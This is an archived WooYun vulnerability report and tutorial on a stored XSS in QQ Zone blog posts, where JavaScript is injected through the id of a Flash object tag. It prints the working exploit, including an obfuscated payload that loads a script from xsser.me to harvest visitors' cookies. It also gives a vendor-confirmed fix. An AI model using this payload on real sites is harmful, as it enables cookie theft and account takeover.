当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016803

漏洞标题:[腾讯实例教程] 那些年我们一起学XSS - 21. 存储型XSS进阶 [猜测规则,利用Flash addCallback构造XSS]

相关厂商:腾讯

漏洞作者: 心伤的瘦子

提交时间:2013-01-01 21:44

修复时间:2013-02-15 21:44

公开时间:2013-02-15 21:44

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-01: 细节已通知厂商并且等待厂商处理中
2013-01-05: 厂商已经确认,细节仅向厂商公开
2013-01-15: 细节向核心白帽子及相关领域专家公开
2013-01-25: 细节向普通白帽子公开
2013-02-04: 细节向实习白帽子公开
2013-02-15: 细节向公众公开

简要描述:

有些时候,我们拿现成的XSS代码都不行,都被过滤了,那么需要我们对过滤的规则进行一定的判断与猜测。然后针对性的使用一些技巧来适应或者绕过规则。
在本例中,我们以QQ空间/QQ校友的日志功能为例,通过猜测简单的过滤规则,然后使用含有addCallback的flash,来实现了存储型XSS的构造。

详细说明:

1. 前提:本例需在IE9,IE10下进行。
2. 我们乌云上报告的一些已有案例,进行了再次测试。
WooYun: PKAV腾讯专场 - 6. (QQ空间+朋友网)日志功能存储型XSS
上例中,提到了QQ空间日志并未对object标签进行有效的过滤。
3. 我们根据此例中的代码对过滤规则进行测试:

<object width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">


以上的代码,是可以正常提交,并且未过滤的。

<object width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://mysite.com/vphoto.swf"><PARAM NAME="Src" VALUE="http://mysite.com/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">


而当swf的域名不是qzs.qq.com时候,代码将会被过滤为以下内容。

<object width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="AllowScriptAccess" VALUE="always">


即地址被去掉了。
4. 那么我们已知了这个过滤规则, 就有2种绕过的方式。
4.1 找到一个qzs.qq.com域名下存在缺陷的FLASH,然后加以利用。
此方法,已经在 @gainover 的 WooYun: PKAV腾讯专场 - 6. (QQ空间+朋友网)日志功能存储型XSS 有所介绍了。
4.2 利用Flash的addcallback缺陷来构造存储型XSS。
5. 首先说下flash addcallback方法的基本原理。
根据flash sdk 里的源代码,我们可以得到flash addcallback 的源代码中有以下代码。

if ((((activeX == true)) && (!((objectID == null))))){
	_evalJS((((("__flash__addCallback(document.getElementById(\"" + objectID) + "\"), \"") + functionName) + "\");"));
};


108.jpg


其中objectID为调用FLASH的HTML标签的ID。functionName则为被JS所调用的函数名称。
6. 当我们有以下代码时:

<object id="aaaa" width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">


且http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf 中存在一句
ExternalInterface.addCallback("myfunc",funcInFlash);
则有

objectID="aaaa";
functionName="myfunc";


代入上面那句_evalJS中,则有

__flash__addCallback(document.getElementById("aaaa"), "myfunc");


7. 那么我们可以想象一下,如果 aaaa 替换为 aaaa"),alert(1),("
则上面代码变为

__flash__addCallback(document.getElementById("aaaa"),alert(1),(""), "myfunc");


解析:

104.jpg


8. 且FLASH中,确实未对objectID做任何过滤。 基于以上内容,我们可以构建利用代码。

<object id='aaaa"),alert(1),("' width="100%" height="100%" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">


我们自己用上面这段代码先在自己网站上测试下:

105.jpg


看,果然id里的代码被执行了!
9. 利用以上原理,接着我们在QQ空间里来做测试,至于FLASH么,就是现成的!
虽然这个FLASH里没有缺陷,但是存在addCallback的调用,我们就可以直接用它。

<object width="100%" height="100%" align="middle" id="xsstest1&quot),(function(){if(!window.__x){window.__x=1;window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,101,114,46,109,101,47,66,113,112,57,82,121);document.body.appendChild(window.s);}})(),(&quot;" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" type="application/x-shockwave-flash"><PARAM NAME="Movie" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="Src" VALUE="http://qzs.qq.com/qzone/client/photo/swf/vphoto.swf"><PARAM NAME="AllowScriptAccess" VALUE="always">


发布日志,使用以上代码

106.jpg


10. 当用户访问含有XSS代码的日志后,我们可以在xsser.me查看所记录的cookies内容。

107.jpg


漏洞证明:

见详细说明,仅IE9, 10 受影响。QQ空间/校友同时受影响。

修复方案:

1. 过滤object标签
2. 设置allowscriptaccess为never ,即使设置为 sameDomain, 也可能找到同域下含有addCallback调用的FLASH。

版权声明:转载请注明来源 心伤的瘦子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-01-05 10:29

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无

漏洞评价:

评论

这些评论似乎很乌云~~~思密达
  1. 2013-01-09 20:15 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    补充:后测试,由于测试环境出错导致之前误以为仅IE9,10可行,其实这个漏洞,IE8下测试也是通过的。 感谢@p.z 大牛指出。 IE6,7大家自己去测试。 @xsser 来,评论思密达一下!

  1. 2013-01-01 22:45 | 钱途 ( 普通白帽子 | Rank:273 漏洞数:44 )

    沙发

  2. 2013-01-01 22:54 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @xsser 剑心,节目预告系统貌似不完美呀,表示21集没收到提示呀~

  3. 2013-01-01 23:06 | dyun ( 普通白帽子 | Rank:102 漏洞数:15 | [code][/code])

    @xsser 确实是呀,这不科学

  4. 2013-01-01 23:56 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    mark、、

  5. 2013-01-02 04:20 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    老婆给当程序员的老公打电话:“下班顺路买一斤包子带回来,如果看到卖西瓜的,买一个。”当晚,程序员老公手捧一个包子进了家门。。。老婆怒道:“你怎么就买了一个包子?!”老公答曰:“因为看到了卖西瓜的”

  6. 2013-01-02 11:07 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @心伤的瘦子 这么老的段子你也发。。。

  7. 2013-01-02 11:10 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    猛然发现4 5 6楼的描述最后都有个 ...

  8. 2013-01-02 11:58 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    @gainover 夜深人静时刻比较怀旧

  9. 2013-01-04 15:51 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    我没收到提示啊,我还追星呢!!!@xsser 这功能怎么回事啊?

  10. 2013-01-06 16:20 | TituX ( 路人 | Rank:19 漏洞数:3 | <script></script>)

    手动来关注了~一定是播预告的都被感化了

  11. 2013-01-06 18:08 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @心伤的瘦子 二哥我爱你

  12. 2013-01-06 21:14 | LittlePig ( 路人 | Rank:5 漏洞数:2 | </html>)

    rank竟然不是15,这不科学

  13. 2013-01-09 20:15 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    补充:后测试,由于测试环境出错导致之前误以为仅IE9,10可行,其实这个漏洞,IE8下测试也是通过的。 感谢@p.z 大牛指出。 IE6,7大家自己去测试。 @xsser 来,评论思密达一下!

  14. 2013-01-11 13:02 | KKZ ( 路人 | Rank:1 漏洞数:1 )

    大哥,你耗上腾讯了

  15. 2013-01-14 18:43 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @心伤的瘦子 已思密达

  16. 2013-01-14 18:50 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @xsser 可以弄个道具,评论思密达,1WB,10次

  17. 2013-01-19 16:52 | DragonEgg ( 实习白帽子 | Rank:75 漏洞数:18 | 冷漠无情的绅士,温柔善良的坏蛋。)

    看不到。。看不到,,舍不得乌云币思密达。。T.T

  18. 2013-01-21 12:43 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    @心伤的瘦子 我们想采用你的文章 一直联系不到你 我们下期刊登 没意见就不用回复了 谢谢

  19. 2013-01-21 13:00 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    [img]http://aa.jpg[/img]

  20. 2013-01-21 13:01 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    <div class="good_replys_title"> 这些评论似乎很乌云~~~思密达 </div>

  21. 2013-04-04 23:50 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    @心伤的瘦子 写的真好!学习了!教程太给力了!

  22. 2013-05-15 22:15 | 流星warden ( 实习白帽子 | Rank:54 漏洞数:8 | The quieter you become,the more you are ...)

    mark

  23. 2013-10-13 09:51 | 撸王之王撸断肠 ( 路人 | Rank:2 漏洞数:2 | 撸不动了)

    mark~

  24. 2014-01-01 22:33 | 7dscan ( 路人 | Rank:26 漏洞数:8 | 奇点云安全 http://www.7dscan.com)

    mark

  25. 2014-03-29 16:33 | waldens ( 路人 | Rank:0 漏洞数:1 | 小菜鸟一枚)

    @心伤的瘦子 再多写点文章那

  26. 2014-10-25 15:11 | 兜帽 ( 路人 | Rank:3 漏洞数:3 | "><script>alert("xss")</script>)

    欧巴,思密达Want to with you "啪啪啪"